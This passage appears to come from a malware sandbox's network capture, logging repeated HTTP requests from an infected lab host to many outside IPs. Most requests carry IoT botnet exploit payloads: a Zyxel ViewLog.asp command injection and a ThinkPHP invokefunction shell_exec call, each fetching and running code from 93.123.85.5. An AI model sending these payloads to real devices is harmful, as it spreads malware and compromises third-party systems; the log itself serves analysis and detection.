                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:23.362684965 CET17797OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:56.382435083 CET20688OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              711192.168.2.234427431.136.82.838080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.406848907 CET13905OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.414653063 CET14032OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:55.398366928 CET14270OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:59.557854891 CET14772OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:07.492914915 CET15801OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:23.362684965 CET17797OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:56.382438898 CET20689OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              712192.168.2.235238462.29.93.1778080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.419569016 CET13905OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              713192.168.2.234208262.29.93.1278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.423388958 CET13906OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              714192.168.2.233639862.29.2.2358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.429512024 CET13907OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              715192.168.2.234979895.86.73.1408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.437325954 CET13908OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              716192.168.2.234740295.128.218.1680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.526130915 CET13909OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:52.835504055 CET14016INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:52 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              717192.168.2.234397495.86.119.18180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.729993105 CET13923OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              718192.168.2.233491262.150.185.698080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.788373947 CET14006OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.171979904 CET14028INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 106
                                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              719192.168.2.235212888.124.152.23480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:53.421587944 CET14033OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:53.749809980 CET14067INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 475
                                                              Connection: close
                                                              ETag: "622f06cd-1db"
                                                              Nov 13, 2023 22:19:53.753531933 CET14071INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Freebox :: Requte invalide</title><link href="/e


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              72192.168.2.233985294.23.121.1518080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.350359917 CET2582OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:20.645199060 CET2592INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:20 GMT
                                                              Server: Apache/2.4.18 (Ubuntu)
                                                              Strict-Transport-Security: max-age=15768000
                                                              Content-Length: 362
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              720192.168.2.234749288.30.31.17780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:53.440160990 CET14034OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              721192.168.2.235393462.4.9.18080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:53.467773914 CET14035OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              722192.168.2.234959631.136.47.858080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:55.116523027 CET14265OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:56.134277105 CET14387OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.181989908 CET14627OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.373505116 CET15147OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:10.564384937 CET16177OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:26.946214914 CET18256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:00.477847099 CET20695OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
